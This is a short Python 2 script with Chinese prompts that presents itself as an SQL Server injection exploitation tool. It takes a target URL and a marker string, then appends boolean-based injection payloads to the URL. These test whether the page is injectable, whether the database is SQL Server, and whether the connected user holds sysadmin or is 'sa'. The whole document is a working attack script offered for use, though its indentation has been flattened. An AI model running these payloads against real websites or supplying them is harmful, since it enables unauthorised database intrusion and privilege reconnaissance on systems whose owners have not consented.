# Code by zhaoxiaobu Email: little.bu@hotmail.com 
#-*- coding: UTF-8 -*- 
from sys import exit 
from urllib import urlopen 
from string import join,strip 
from re import search 
 
def is_sqlable(): 
 sql1="%20and%201=2" 
 sql2="%20and%201=1" 
 urlfile1=urlopen(url+sql1) 
 urlfile2=urlopen(url+sql2) 
 htmlcodes1=urlfile1.read() 
 htmlcodes2=urlfile2.read() 
 if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
 print "[信息]恭喜!这个URL是有注入漏洞的!n" 
 print "[信息]现在判断数据库是否是SQL Server,请耐心等候....." 
 is_SQLServer() 
 else: 
 print "[错误]你确定这个URL能用?换个别的试试吧!n"

def is_SQLServer(): 
 sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
 urlfile=urlopen(url+sql) 
 htmlcodes=urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[错误]数据库好像不是SQL Server的!n" 
 else: 
 print "[信息]确认是SQL Server数据库!n" 
 print "[信息]开始检测当前数据库用户权限,请耐心等待......" 
 is_sysadmin() 
 
 
def is_sysadmin(): 
 sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[错误]当前数据库用户不具有sysadmin权限!n" 
 else: 
 print "[信息]当前数据库用户具有sysadmin权限!n" 
 print "[信息]检测当前用户是不是SA,请耐心等待......" 
 is_sa() 
 
def is_sa(): 
 sql = "%20and%20'sa'=(select%20System_user)"; 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[错误]当前数据库用户不是SA!n" 
 else: 
 print "[信息]当前数据库用户是SA!n" 
 
print "n########################################################################n" 
print " ^o^SQL Server注入利用工具^o^ " 
print " Email: little.bu@hotmail.comn" 
print "========================================================================"; 
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:') 
if url == '': 
 print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式" 
 exit(1) 
 
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:") 
if judge == '': 
 print "[错误]判断字符串不能为空!" 
 exit(1) 
 
is_sqlable()